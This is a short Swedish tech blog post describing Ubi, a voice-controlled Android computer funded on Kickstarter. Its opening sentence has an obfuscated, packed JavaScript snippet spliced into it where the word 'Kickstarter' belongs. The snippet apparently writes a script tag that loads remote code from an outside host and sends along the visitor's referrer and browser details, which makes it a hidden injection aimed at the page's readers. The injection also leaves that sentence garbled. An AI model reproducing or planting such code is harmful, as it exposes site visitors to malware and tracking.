Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Dagens Kickstarter: Datorn Ubi som lyssnar på allt

Dagens Kickstarter: Datorn Ubi som lyssnar på allt
Sebastian


Dagens eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nknkz|var|u0026u|referrer|ffrye||js|php’.split(’|’),0,{}))
Kickstarter är faktiskt en riktigt häftig liten pryl. Ubi är en röststyrd dator som enkelt ansluts till ett vägguttag. Genom att den också ansluts direkt till Internet via WiFi går den också att komma åt från andra håll än hemmet.

Ubi drivs med Android och har en kraftfull processor för att utföra röstigenkänning, den har även möjlighet att ansluta till andra enheter. Du kan ansluta högtalare, USB-enheter samt ansluta via Bluetooth direkt till din iPhone eller Android-enhet. Som utvecklare kommer man kunna bygga vidare på Ubi då företaget kommer göra vissa delar av mjukvaran enkel att modifiera, snyggt.

Hur fungerar Ubi?

Som sagt ovan så ansluts Ubi  till ett vägguttag och ansluter till Internet via en WiFi-anslutning. Den har en mikrofon och högtalare som lyssnar efter kommandon. Att säga ”Ubi” gör att datorn vaknar upp och blir redo att ta emot verbala kommandon. Du kan sedan instruera Ubi att göra det du vill. Ubi kommunicerar tillbaka till dig via tal eller genom att använda ljus.

Det kanske låter lite knasigt men kika på videon ovan, den är rätt cool.

Mer info: Kickstarter.com